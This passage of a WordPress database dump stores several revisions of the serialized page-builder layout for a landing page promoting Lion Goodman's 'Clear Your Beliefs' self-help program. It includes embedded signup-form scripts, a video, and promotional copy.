box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1263, 1735, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -33px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1266, 1737, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:573:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -32px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -48px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:659:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1264, 1736, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:585:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8" padding="0"]\n\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:873:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -33px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -25px;"><script 